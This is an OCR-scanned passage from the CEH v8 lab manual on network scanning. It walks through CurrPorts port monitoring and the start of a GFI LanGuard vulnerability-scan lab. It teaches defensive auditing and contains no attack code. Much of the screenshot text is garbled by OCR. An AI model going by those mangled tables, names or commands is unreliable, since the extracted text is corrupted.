c fc x .c g f - e f c x e R‫״‬fr# {h (p firc fo x .e 1(c ‫ס‬7‫קז‬ 1l i (Bfaefcxue 1368 TCP JftfM cotae I368 TCP ® fr e f c x e t e 1368 TCP h tto d . e x e 1800 TCP Vhttpd.exe 1800 TCP Qlsassete 564 TCP 561 TCP HTML Report - Selected terns Choose Columns Auto SizeColumns 4163 4156 4108 1070 1070 1028 1028 NirSoft F reew are. http‫־‬.//w w w .rirsoft.net79Tct«l Ports, 21 Remote Connection!, 1 Selected FIGURE 4.2 The CunPortswithHTMLReport- AllItems 4. The HTML Report automatically opens using die default browser. E<e Ldr View History Bookmarks 1001‫צ‬ Hdp I TCP/UDPPortsList j j f j_ ^ (J ft e ///C;/User1/Administralor/Desfctop/cp0fts-xt>£,repcriJitml ' ‫•£־־־*־‬ - Google P ^ TC P/U D P Ports List Created bv using CurrPorts ‫י‬ = P m « j .Nam• Protiti ID Protocol I.oral Port IAral Port Na*e Local Addivit Remote Port ‫׳‬RcmoU Port .Name Rtmvl« Addrtit chxame rxc 2988 TCP 4052 10 00 7 443 https 173 194 36 4 bo chiome.exc 2988 TCP 4059 10.0.0.7 80 http 173.194.36.17 bo ch101nc.exe 2988 TCP 4070 10.0.0.7 80 http 173.194.36.31 bo daome.exe 2988 TCP 4071 10.0.0.7 80 hltp 173.194.36.31 bo! daome.exe 2988 TCP 4073 100.0.7 80 hltp 173.194.36.15 boi daome.exe 2988 TCP 4083 10.0.0.7 80 http 173.194.36.31 bo! cfcrorae.exe 2988 TCP 4090 100.0.7 80 hnp 173.194.36.4 bo! chfomc.cxc 2988 TCP 4103 100.0.7 80 hltp 173.194.36.25 bo bo > chrome exe 2988 TCP 4104 10 00 7 80 hnp 173 194 36 25 FIGURE 4.3:Hie Web browser displayingCunPorts Report- AllItems 5. To save the generated CiirrPorts report from die web browser, click File ‫־‬> Save Page As...Ctrl+S. / / CurrPorts utility is a standalone executable, which doesn't require any installation process or additional DLLs. Q In the bottom left of the CurrPorts window, the status of total ports and remote connections displays. E3To check the countries of the remote IP addresses, you have to download the latest IP to Country file. You have to put the IpToCountry.csv‫״‬ file in the same folder as cports.exe. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 105
Module 03 - Scanning Networks ■3 5‫ד‬TCP/UDP Ports List - Mozilla Firefox ‫ק‬ ‫ז‬ ‫ו‬ i d * «1ry> H ito ry Bookm aikt Took H rlp P *C • ! 1 ‫־‬ Google»f1‫׳‬Dcsttop/q)D1ts-x64/rEpor: htm l fJcw l i b C W *T Window/ Ctr1*N Cpen F ie .. CcrUO S *.« Page As.. Ctr1*S Send Link- Pag* Setup-. Prm tP i& K w Errt. tl* !.oral Port I o ral Port Name Local A d d rv u Remote Pori Kemotc Port Name Keu1ul« A d d n it!,ro tifjj >111• ID rrotocol chiome.cxc 2988 TCP 4052 10.0.0.7 443 https 173.194.36.4 boj cfc10 me.exe 2988 TCP 4059 10.0.0.7 80 http 173.194.36.17 bo: chrome.exe 2988 TCP 4070 10.0.0.7 80 hnp 173.194.36.31 bo: chrome.exe 2988 TCP 4071 10.0.0.7 80 http 173.194.36.31 boi chrome exe 2988 TCP 4073 100 0 7 80 http 173 194 36 15 boi chrome exe 2988 TCP 408; 100 0 7 80 http 173 194 36 31 boi chrome exe 2988 TCP 4090 100 0 7 80 http 173 194 36 4 boi chiome.cxe 2988 TCP 4103 10.0.0.7 80 http 173.194.36.25 boi daome.exe 2988 TCP 4104 10.0.0.7 80 http 173.194.36.25 b03 FIGURE 4.4: TheWeb browserto SaveCurrPorts Report- AllItems 6. To view only die selected report as HTML page, select reports and click V iew ‫>־‬ HTML Reports ‫־‬ S elected Items. 1- 1° ‫׳‬ x -CurrPorts Address Rem... Rem... RemoteAddress Remote Host Nam ).7 80 http 175.19436.26 bom04s01-1n‫־‬f26.1 ).7 80 http 173.1943626 bom04s01-1n‫־‬f26.1 F 80 http 173.1943626 bcm04s01-in‫־‬f26.1f ■0.7 80 http 215720420 323-57-204-20.dep P7 443 http: 173.1943526 bcm04s0l-in-f26.1 .0.1 3982 12700.1 WIN-D39MR5HL9E .0.1 3981 12700.1 WIN-D39MR5HL9E J>.7 443 https 173.1943622 bom04s01-in-f22.1 File Edit | View | Option) Help X S (3 ShowGrid L‫אחו‬ ProcessNa P I ShowTooltips C chrome. Mark Odd/Even Rows HTML Report - All Items HTML Report ■ Selected terns C c h ro m e f O 'chrom e “ Ctrl♦■Plus F5 Choose Columns ®,firefcxe Auto SizeColumns (g fir c f c x e : Refresh fircfcx e<v fircfox.exe 1368 TCP 4163 1000.7 443 http; 173.194,36.15 bomOlsOI -in‫־‬f15.1 fircfcx.cxc 1368 TCP 4166 1000.7 443 http: 173.194360 bomOlsOI -in‫־‬f0.1c ^fircfcx.ccc 1368 TCP 416S 100.0.7 443 https 74125234.15 gruC3s05 in-f15.1c httpd.exe 1000 TCP 1070 0.0.0.0 0.0.0.0 ^ httpd.exe 1000 TCP 1070 s Qlsassexe 564 TCP 1028 00.0.0 0.0.0.0 Q lsaw ac 564 TCP 1028 « ---------a.------- 14nn Trn ‫י«׳*־ו־‬ __ AAAA AAAA HirSoft F reew are. h ttp . ‫׳‬,‫׳‬ ,w w w .r irs o ft.n e t79'ctel Ports. 21 RemoteConnections, 3Selected FIGURE4.5:CurrPortswithHTMLReport- SelectedItems 7. The selected report automatically opens using the default browser. m CurrPorts allows you to save all changes (added and removed connections) into a log file. In order to start writingto the log file, check the ,Log Changes' option under the File menu 2Zy" By default, the log file is saved as cports.log in the same folder where cports.exe is located. You can change the default log filename by setting the LogFilename entry in the cports.cfg file. ^ Be aware! The log file is updated only when you refresh the ports list manually, or when the Auto Refresh option is turned on. a You can also right- click on the Web page and save the report. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 106
Module 03 - Scanning Networks TCP/UDPPorts List - Mozilla Firefox I 1‫־‬ n J~x ffi'g |d: V‫־‬»cv» Hatory Bookmaiks Toob Help [ ] TCP/UDPPortsList | + ^ W c /'/C /lh e rv ‫׳‬Admin 1strotor/Dr5fctop/'cport5‫־‬r 64/rcpo‫די‬i«0T1l (?‫־‬ GoogleP |,f t I TC P /V D P Ports List Created by ining CiirrPom Process Name Process ID Protocol Local Port I>ocal Port .Name Local Address Reuiotv Port Remote Port Name Kvuiotc Address Remote Host Name State dbiome.cxc 2988 TCP 4148 10.0.0.7 443 https 173.194.36-26 bom04sC1 m. £26.1e100.net Established c: firefox exe 1368 TCP 4163 10 0 0 7 443 https 173 194 36 15 bom04s01 tn-fl 5.Iel00.net Established C: hUpdcxc 1800 TCP 1070 Listening C: In the filters dialog bos, you can add one or more filter strings (separated by spaces, semicolon, or CRLF). FIGURE 4.6: TheWeb browserdisplayingCuaPortswithHTMLReport- SelectedItems 8. To save the generated CurrPorts report from the web browser, click File ‫>־‬ S ave P age As...Ctrl+S ‫׳‬ r= > r* ‫י‬TCP/‫׳‬UDP Ports List ‫־‬ Mozilla Firefox fi *»r/Deslctop/cpo»tsx6A<repwthtml Edfe Vir* Hutory Boolvfmki Took HWp N**‫׳‬T*b Clrl-T | + | an*N OpenFie... Ctrl»0 Ctrl-SPageA;.S*.« Sir'd lin k - Established C Established C Remote Ilotl .Nioit boxu04s01-ui-1‘26.Iel00.net bom04s01-1a-115.lel00.net Remote Address 173.1943626 173.19436 15 Kcmole Port Name https https Toral Remote Address Port 1000.7 443 443100.0.7 Local Port Name Local PoriID Page :er.p. PnntPreview PrmL. ficit Offline Name 4148TCP2988chtoxne.exe 41631368 TCPfiiefox-cxc 0‫׳‬10TCP1800httpdexe FIGURE 4.7:TheWeb brcnvserto Saw QirrPortswith HTMLReport- SelectedItems 9. To view the properties of a port, select die port and click File ‫>־‬ Properties. / / The Syntax for Filter String: [include | exclude]: [local | remote | both | process]: [tcp | udp | tcpudp] : [IP Range | Ports Range]. ‫ש‬ Command-line option: /stext <F11ename> means save the list of all opened TCP/UDP ports into a regular text file. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 107
Module 03 - Scanning Networks r ® CurrPorts I - ] “ ' * m1 File J Edit View Options Help I PNctlnfo CtrM CloseSelectedTCPConnections Ctri+T Local Address Rem... Rem.. Remote Address Remote Host Nam 1‫י׳‬ Kill Processes Of Selected Ports 10.0.0.7 80 http 173.194.3626 bom04301-in-f26.1 SaveSelected Items CtiUS 10.0.0.7 80 http 3.194.3626‫׳־‬1 bom04501‫־‬in-f26.1 Properties Alt^Entei 1 10.0.0.7 80 http 1^3.194.36.26 bom04s01-in-f26.1 10.0.0.7 80 http 23.57.204.20 a23*57204-20‫.־‬dep ■ ProcessProperties CtiUP 10.00.7 443 https 1Ti 194.36.26 bom04s01-in-f2M Log Changes 127.0.0.1 3982 127.aa1 WIN-D39MR5Hl9f Open Log File 127.0.0.1 3031 127.0L0L1 WIM-D30MRSH10F Clear Log File 10.0.0.7 443 httpt 1 194.3622,‫־‬1 bom04e01-m‫־‬f22.1 Advanced Options CtrUO 10.0.0.7 443 https 173.194.3615 bom04s01-in-f15.1 10.0.0.7 443 https 173.194.360 bom04s01 m‫־‬f0.1c Exit 10.0.0.7 443 https 74.12523415 gru03s05-in‫־‬f15.1e j 1ttjd.exe 1800 TCP 1070 oaao 0DS)S) httod.exe 1800 TCP 1070 :: □ lsass.exe 564 TCP 1028 aao.o 0DSJJJ Qlsass-exe $64 TCP 1028 r. ‫״‬ ‫־‬T > |79 Tctel Ports, 21 RemoteConnections, 1Selected NirSoft Freeware, http:/wvrw.nircoft.net b&i Command-line option: /stab <Filename> means save the list of all opened TCP/UDP ports into a tab-delimited text file. FIGURE 4.8: CunPorts to viewproperties for a selected port 10. The Properties window appears and displays all the properties for the selected port. 11. Click OK to close die Properties window *Properties firefox.exe 1368 TCP 4166 10.0.0.7 443 |https_________________ 1173.194.36.0 bom04s01-in-f0.1 e 100.net Established C:Program Files (x86)M 0zilla Firefoxfirefox.exe Flrefox Firefox 14.0.1 M ozilla Corporation 8/25/2012 2:36:28 PM W IN-D 39M R 5HL9E4Adm inistrator 8/25/2012 3:32:58 PM Process Name: Process ID: Protocol: Local Port: Local Port Name: Local Address: Rem ote Port: Rem ote Port Name: Rem ote Address: Rem ote Host Name: State: Process Path: Product Name: File Description: File Version: Company: Process Created On: User Name: Process Services: Process Attributes: Added On: Module Filenam e: Rem ote IP Country: W indow Title: OK Command-line option: / shtml <Filename> means save the list of all opened TCP/UDP ports into an HTML file (Horizontal). FIGURE 4.9:Hie CunPorts Propertieswindowfor the selectedport Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 108
Module 03 - Scanning Networks 12. To close a TCP connection you think is suspicious, select the process and click File ‫>־‬ C lose S elected TCP C onnections (or Ctrl+T). - _ , » r‫ד‬CurrPorts IPNetlnfo Clrf♦■‫ו‬ Close Selected TCPConnections Ctrl-T Local Address Rem... Rem... RemoteAddress Remote Host Nam I‫י׳‬ Kill ProcessesOfSelected Ports 10.0.0.7 60 http 173.19436.26 bom04s01-in‫־‬f26.1 SaveSelected Items CtH-S 10.0.0.7 80 http 173.19436.26 bom04s01-in‫־‬f26.1 Properties Process Properties AH-Enter Ctrl—P 10.0.0.7 10.0.0.7 10.0.0.7 80 80 443 http http https 173.19436.26 23.5730430 173.19436.26 bom04sC1 in-f26.1 023-57 204 2C.dep bom04s01 in‫־‬f26.1 = Log Changes 127.00.1 3932 127.0.0.1 WIN-D39MR5HL9e Cpen Log File 127.00.1 3931 127.0.0.1 WIN-D39MR5HL9£ Clear Log File 10.0.0.7 443 http: 173.19436.22 bom04s01-in-f22.1 Ad/snced Options Ctrl+0 10.0.0.7 443 https 173.19436.15 bom04s01-in-f15.1 443 https 173.19436.0 bom04s01■in-f0.1s Exit 10.0.0.7 443 https 74.125.234.15 gru03s05-in-f151e ^ httpd.exe 1£03 TCP 1070 0D.0.0 0.0.0.0 httpd.exe 1800 TCP 1070 r □isass^xe 564 TCP 1028 o m o o.aao QtoSfcCNe 564 TCP 1Q28 r ^ J III ‫ד‬ ‫״‬­ I> HirSoft freeware. r-tto:‫׳‬v/Yv*/n rsott.net7?Tot«! Porte, 21 RemoteConnection! 1Selected FIGURE 4.10; ,Hie CunPoits CloseSelectedTCP Connections optionwindow 13. To kill the p ro cesses o f a port, select die port and click File ‫>־‬ Kill P ro cesses of S elected Ports. I~ I‫ם‬ ' *CurrPorts File j Edit View Options Help Loral Addrect Rem... fam.. Remote Addrect Remote Host Nam * 10.0.07 80 http 173.14436.26 bom04t01*in-f26.1 10.0.0.7 80 http 173.194.3626 bomC4t01-in‫־‬f26.1 10.0.0.7 80 http 173.194.3626 bomC4j01-in-f26.1 10.0.0.7 80 http 215720420 a23-57-204-20.dep s 10.0.0.7 443 https 173.1943636 bcmC4s01-in-f26.1 127.0.0.1 3962 127.0.0.1 WIN-D39MR5HL9E 127.0.0.1 3981 127.0.0.1 WIN-D39MR5HL9E 10.0.0.7 443 https 173.1943632 bomC4s01-in-f22.1 10.0.0.7 443 https 173.19436.15 bom04s01‫־‬in‫־‬f15.1 10.0.0.7 443 https 173.19436.0 bom04s0l‫־‬in‫־‬f0.1e 10.0.0.7 443 https 74125334.15 gru03s05-1n-M5.1e an♦! Clil^T P N e tln fo Close Selected T C P C onnection! kin Processes Of Selected Ports Ctrt-S A t-Enter CtrKP Save Selected Items Pro p e rtie c P ro c e s s P ro p e rtie s Log Changes Open Log File Clear Log file Advanced Options Exit 0.0.0.0O.Q.Q.O o.aao ___ /)A A A V htt3d.exe 1800 TCP 1070 Vbttpd.exe 1800 TCP 1070 □l«ss.ete 564 TCP 1028 □ katc *1* 561 TCP 1028 ‫ר‬ II MirSoft Freew are. http -Jta /w w .rirso ft.n e t79Tctel Ports, 21 RemoteConnections, 1Selected FIGURE 4.11: The CurrPorts KillProcesses ofSelectedPorts OptionWindow 14. To exit from the CurrPorts utility, click File ‫>־‬ Exit. The CurrPorts window clo ses. S TASK 2 Close TCP Connection f i T A S K 3 Kill Process Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 109
Module 03 - Scanning Networks ’-‫׳‬1- 1°CurrPons File Edit View Options Help PNetlnfo QH+I CloseSelectedTCPConnections CtrKT .. Local Address Rem... Rem‫״‬ Remcte Address Remcte Host Nam Kil ProcessesOf Selected Ports 10.0.0.7 80 http 173.194.36.26 bom04s01-in-f26.1 SaveSelected Items Ctrfc-S 10D.0.7 80 http 173.194.3626 bom04s01-in-f26.1 Properties Process Properties At-Eater CtH«‫־‬P 10.0.0.7 10.0.0.7 10.0.0.7 80 80 443 http http https 173.194.3626 21572Q420 173.194.3626 bom04s01-in‫־‬f26.1r a23-57-204-20.deJ bom04t01-in-f26.1| log Changes 127.0.0.1 3987 127DD.1 WIN-D39MR5H19P Open Log File 127.0.0.1 3981 127X10.1 WIN-039MR5HL9E Clear Log File 10.0.0.7 443 https 173.194.36-22 bomC4101-in-f22.1 Advanced Option! CtH-0 10.0.0.7 443 https 173.194.36.1S bomC4i01 in‫־‬f15.1 10.0.0.7 443 https 173.194.36i) bcmC4s01 in f0.1q Ext 1 10.0.0.7 443 https 74.125.234.15 gru03sG5in-f15.1e thttpd.exe 1800 TCP 1070 0.0.0.0 0.0.0.0 thttpd.exe 1800 TCP 1070 = = Qlsas&cxe 564 TCP 1028 0.0.00 0.0.0.0 Hlsais-ae 564 TCP 1028 = ‫־־‬ ■ rrn itnt __ /‫ו‬ a /a AAAA Nil Soft free were. Mtpy/vvwvv.rit soft.net79 Tctal Ports. 21 Remote Connections. 1 P ie ced h id Command-line option: / sveihtml <Filename> Save the list of all opened TCP/UDP ports into HTML file (Vertical). FIGURE 4.12: The CurrPoits Exit optionwindow Lab Analysis Document all die IP addresses, open ports and dieir running applications, and protocols discovered during die lab. T ool/U tility Inform ation Collected/O bjectives Achieved Profile Details: Network scan for open ports Scanned Report: ■ Process Name ■ Process ID ■ Protocol CurrPorts ■ Local Port ■ Local Address ■ Remote Port ■ Remote Port Name ■ Remote Address ■ Remote Host Name feUI In command line, the syntax of / close command:/close <Local Address> <Local Port> <Remote Address> <Remote Port‫נ‬ *. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 110
Module 03 - Scanning Networks P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions Analyze the results from CurrPorts by creating a filter string that displays only packets with remote TCP poit 80 and UDP port 53 and running it. Analyze and evaluate die output results by creating a filter that displays only die opened ports in die Firefox browser. Determine the use of each of die following options diat are available under die options menu of CurrPorts: a. Display Established b. Mark Ports O f Unidentified Applications c. Display Items Widiout Remote Address d. Display Items With Unknown State Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 !Labs 1. ‫.כ‬ Q CurrPorts allows you to easily translate all menus, dialog boxes, and strings to other languages. Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 111
Module 03 - Scanning Networks Lab Scanning for Network Vulnerabilities Using the GFI LanGuard 2012 GFILANgwrd scansnetworksandports to detect, assess, andcorrectany security vulnerabilities thatarefound. Lab Scenario You have learned in die previous lab to monitor TCP IP and UDP ports 011 your local computer or network using CurrPorts. This tool will automatically mark widi a pink color suspicious TCP/UDP ports owned by unidentified applications. To prevent attacks pertaining to TCP/IP; you can select one or more items, and dien close die selected connections. Your company’s w eb server is hosted by a large ISP and is well protected behind a firewall. Your company needs to audit the defenses used by die ISP. After starting a scan, a serious vulnerability was identified but not immediately corrected by the ISP. An evil attacker uses diis vulnerability and places a backdoor on the server. Using die backdoor, the attacker gets complete access to die server and is able to manipulate the information 011 the server. The attacker also uses the server to leapfrog and attack odier servers 011 the ISP network from diis compromised one. As a security administrator and penetration tester for your company, you need to conduct penetration testing in order to determine die list of threats and vulnerabilities to the network infrastructure you manage. 111 diis lab, you will be using GFI LanGuard 2012 to scan your network to look for vulnerabilities. Lab O bjectives The objective of diis lab is to help students conduct vulnerability scanning, patch management, and network auditing. 111 diis lab, you need to: ■ Perform a vulnerability scan I CON KEY Valuable information ✓ Test your knowledge Web exercise Q Workbook review ZU Tools dem onstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 112
Module 03 - Scanning Networks ■ Audit the network ■ Detect vulnerable ports ■ Identify sennit}‫־‬vulnerabilities ■ Correct security vulnerabilities with remedial action Lab Environm ent To perform die lab, you need: ■ GFI Languard located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksWulnerability Scanning ToolsGFI LanGuard ■ You can also download the latest version of GFI Languard from the link http://www.gfi.com/la1111etsca11 ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ A computer running Windows 2012 Server as die host machine ■ Windows Server 2008 running in virtual machine ■ Microsoft ■NET Framework 2.0 ■ Administrator privileges to run die GFI LANguard Network Security Scanner ■ It requires die user to register on the GFI w ebsite http: / / www.gii.com/la1111etsca11 to get a license key ■ Complete die subscription and get an activation code; the user will receive an email diat contains an activation code Lab Duration Time: 10 Minutes O verview of Scanning N etw ork As an adminisuator, you often have to deal separately widi problems related to vulnerability issues, patch m anagement, and network auditing. It is your responsibility to address all die viilnerability management needs and act as a virtual consultant to give a complete picture of a network setup, provide risk analysis, and maintain a secure and compliant network state faster and more effectively. Security scans or audits enable you to identify and assess possible risks within a network. Auditing operations imply any type of checking performed during a network security audit. These include open port checks, missing Microsoft patches and vulnerabilities, service infomiation, and user or process information. Q You can download GFI LANguard from http:/ /wwwgfi.com. Q GFI LANguard compatiblyworks on Microsoft Windows Server 2008 Standard/Enterprise, Windows Server 2003 Standard/Enterprise, Windows 7 Ultimate, Microsoft Small Business Server 2008 Standard, Small Business Server 2003 (SP1), and Small Business Server 2000 (SP2). C -J GFI LANguard includes default configuration settings that allowyou to run immediate scans soon after the installation is complete. Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 113
Module 03 - Scanning Networks Lab Tasks Follow die wizard-driven installation steps to install die GFI LANguard network scanner on die host machine windows 2012 server. 1. Navigate to W indows Server 2012 and launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop FIGURE 5.1:Windows Server 2012- Desktop view 2. Click the GFI LanGuard 2012 app to open the GFI LanGuard 2012 window Marager Windows Google bm r ♦ * Nnd V e FT‫־‬ £ SI 2)G 0 FIGURE 5.2 Windows Server2012- Apps 3. The GFI LanGuard 2012 main window appears and displays die Network Audit tab contents. B TASK 1 Scanning for Vulnerabilities Zenmap file installs the following files: ■ Nmap Core Files ■ Nmap Path ■ WinPcap 4.1.1 ■ Network Interface Import ■ Zenmap (GUI frontend) ■ Neat (Modern Netcat) ■ Ndiff / / To execute a scan successfully, GFI LANguard must remotely log on to target computers with administrator privileges. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 114
Module 03 - Scanning Networks W D13CIA3 this ■‫י‬ GFI LanGuard 2012 I - | dashboard Seen R em e d y ActMty Monitor Reports Configuration UtSties Welcome to GFI LanGuard 2012 GFI LanGuard 2012 is ready to audit your network iw rtireta&dites View Dashboard Invest!gate netvuor* wjinprawiir, status and autil results Remodiate Security Issues Deploy missing patches untnsta«wwuih0rt»d30*1‫׳‬a‫״‬e. turn on ondviius and more Manage Agents Enable agents to automate ne*vroric secant? audi and to tfstribute scanning load across client macrones JP 9 % Local Com puter Vulnerability Level u s• ‫־‬Nana9# *gents‫־‬or Launch a scan‫־‬ options 10, the entile network. M< {'Mow cafh'e. — iihjIJ■: C u n en t Vulnerability Level is: High -I Launch a Scan Manually set-up andtnuser an aoerSess ne*rrxfcseajrit/ audit LATES1 NLWS tx k u l a ^ n t e d ID I -XI } u n jp W ‫־‬t>m ? !1 7(ft m» lar ‫־‬ l w mr‫»־‬ MCOort for APS81? IS. Mohr. Arrvhm !) 5 2 Pro and Standivri tr.vi • n - n u w l 10( APS812-1S. Mobm Acrobat 10.1.4 Pro mtd St— a - 0 - - M j u t V# ?*-Ajq-7017 - Patch MmuxirTimri - N n pi 1 ( 74 A q 701? Patch Mnrvtgnnnnl Added V*, 24-AJO-2012 - Patch M4 u u « m < - Add'd eaThe default scanning options which provide quick access to scanning modes are: ■ Quick scan ■ Full scan ■ Launch a custom scan ■ Set up a schedule scan FIGURE 5.3:Hie GFI LANguardmamwindow 4. Click die Launch a Scan option to perform a network scan. GFI LanGuard 2012 « t Di»e1«s thb versionOoshboerd Scan Remediate AdM ty Monitor Reports Configuration Ut*ties View Dashboard Investigate network! wjineraMit, status andauairesults Remediate Security Issues Deploy missing patches uninsia■ un8uv>o<Ue4soS«rare. turn on antivirus ana more Manage Agents Enable agents to automate noteror* secant* aud* and to tfstnbute scanning load across client machines JP 9 % Welcome to GFI LanGuard 2012 GFI LanGuard 2012 1& ready to audit your network V* *A m a b M w s Local Computer Vulnerability Level use ‫־‬van a;# Agents‫־‬or Launch a scan‫־‬ options 10 auoa the entire network. t - ^ - ‫־‬ ‫־‬ ‫־‬‫&־.יז‬ iim j M : C u n en t Vulnerability Lovel is; High Launch a Scan Manually *<rt-up andtnooer anagerttest rw‫׳‬tw j‫.»׳‬»ta in t/ audit LAI L S I NLWS < j ?4-Ajq-?01? - fa it h M<au»)«nenl - N r . pn xkjrf !^ p o rte d POF-XDum^r M e n a 2 ‫ל‬ TOb meu l a - R m i V * 2 4 A jq-2012 Patch Management Added support for APS812-16. Adobe Acrobat 9 5 2 Pro and Standard -»‫־‬«‫־‬- 24-Aju-2012 - Patch MdHdumuiri - Added suvoit lor APS812-16. Adobe Acrobat 10.1.4 Pro and Standcffd - F=ad ‫»־‬■ FIGURE 5.4:The GFI LANguard mainwindowindicatingdie Launch aCustom Scanoption 5. Launch a New scan window will appear i. 111die Scan Target option, select localhost from die drop-down list ii. 111die Profile option, select Full Scan from die drop-down list iii. 111 die Credentials option, select currently logged on user from die drop-down list 6. Click Scan. m Custom scans are recommended: ■ When performing a onetime scan with particular scanning parameters/profiles ■ When performing a scan for particular network threats and/or system information ■ To perform a target computer scan using a specific scan profile ^ If intrusion detection software (IDS) is running during scans, GFI LANguard sets off a multitude of IDS warnings and intrusion alerts in these applications. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 115
Module 03 - Scanning Networks ‫־‬r x°‫־‬ ‫ן‬’GF! LanGuard 2012 CJ, Uiscuuttm1Dashboard Scan Ranrdijle Activ.tyMonitor Reports Conf!guraUon III41m•> l« - I ta u a d ia tn e S a n SCar‫־‬aro2t: pooac: b a t e : v M jf-J S ^n v * O t0en:‫־‬fc- ?axrrard: k»/T«rt(r ockcC on uso‫־‬ V II ‫י‬ — II Scar Qaccre... S o n ■ n d t i Ovrrvlew SOM R r u lti Orta 1l< FIGURE 5.5: Selectingan option for network scanning 7. Scanning will start; it will take some time to scan die network. See die following figure m For large network environments, a Microsoft SQL Server/MSDE database backend is recommended instead of the Microsoft Access database. m Quick scans have relatively short scan duration times compared to full scans, mainly because quick scans perform vulnerability checks of only a subset of the entire database. It is recommended to run a quick scan at least once a week. 8. After completing die scan, die scan result will show in die left panel Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 116
Module 03 - Scanning Networks x□ ‫־‬I‫־‬,GFI Lar>Guard2012 y I I Dashboard Scan Rcfnrdutr Actwty Monitor Reports Configuration Lttrfrtm &tauKkalnikin ScanTarget K a te: ccaftoct V ... | FalSar H j£c1'«arr: Eaasword: Cj-rr& t bcaed on iser v II Scan R r a k i Detail*Scan R n a k i ovrrvirw Scan completed! SutnmwY 8f *ear resuts 9eneraf0<1duT>51* 1>703 a u * operations processed 20<20C‫׳‬tcai‫׳‬Hgr> 1313 Crecol'-.qh) 3 V ulnerab ility le ve l: The average vulnefabilty B.e (or ttus sea‫־‬nr s 1 H jjjjtfiia fl R esu lts s ta tis tic s : Audit operations processed; LKssina software updates: Other vulneraNlthcs: Potential vulnerabilities: 4 •team target: lor.ilhost - y 10 0 0 7 |WM-D39MRSIIL9I41 (WiixJwwa . Scanner ActMty Wkxkm • ‫*ו^יז‬ CanptJar Citar VJUH>raW Jt«!a *nan? pifctv* scar fhe ! ‫ו‬4‫ז<יו‬ :ate 101 f r s q v aftwmr■wunr isatvaM or not found i----------- 12- 1 FIGURE 5.7:The GFI LanGuard Customscanwizard 9. To check die Scan Result Overview, click IP address of die machinein die right panel 10. It shows die Vulnerability A ssessm ent and Network & Software Audit: click Vulnerability A ssessm ent GFI LanGuard 2012 W, Dis c u m tvs vtssaanJ | ^ | Daihboaid Sean R a n n U ( A d M y M o rilo r Reports Configuration Ut44«s E- SCafiTaroiC: Piofe: ocafost v j . . . | |F‫״‬ IS 1‫־‬ ‫״‬ * 1 • Q ederufe: Userrvaae: ?a££0.‫׳‬rd: C j‫־‬end, bcaec on user I I J ••• 1 ___ ^ _____1 1Results Details ‫׳‬ [YVM-039MR%ML<H4| (Windows Server ?01? 164) Vulnerability level: f►•* corrvwar dues not have a Vuhe'aHty te.el •VII. * : Y/fcatdim iraan? Possible reasons: t. Tha •can b not Inched yet. 2. OsCectbn of missing patches and vuinerabif.es 8 3«at>«d *a ■ na scannira profle used to perform the scan. 3‫־‬The credentfeia used 10 3c8n this compute' <‫נג‬ nor »»:«* • * w a rty ecamer 10 refrteve 81!required hformaton tor eumatro we VutteroBlty Level An account w th s a u n r r a ,• :rs-eoei or rne target computer is requred * Certan securty srttnqs on the remote CDtrputer Dtoct r * access of Ite security scanner. Betam s a fart of msst # V a n tn r y t : lornlhost | | - 0 10 0 ‫־‬‫ר‬ V |WIW-OJ9MtOHL9L4| (Wimkms J ] j . , <1> w a H 1ty W ^ n rr n t | ‫־‬• n Net-war* & Softwire Audit Scaruicr A ctM ty Window flt e e t lK M Q L H1rv*d I (kill•) U ..‫״‬ M •' ■<v> I Ic— t f i i s l d r i I ftw w l FIGURE 5.8: SelectingVulnerabilityAssessment option Types of scans:m Scan a single computer: Select this option to scan a local host or one specific computer. Scan a range of computers: Select this option to scan a number of computers defined through an IP range. Scan a list of computers: Select this option to import a list of targets from a file or to select targets from a network list. Scan computers in test file: Select this option to scan targets enumerated in a specific text file. Scan a domain or workgroup: Select this option to scan all targets connected to a domain or workgroup. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 117
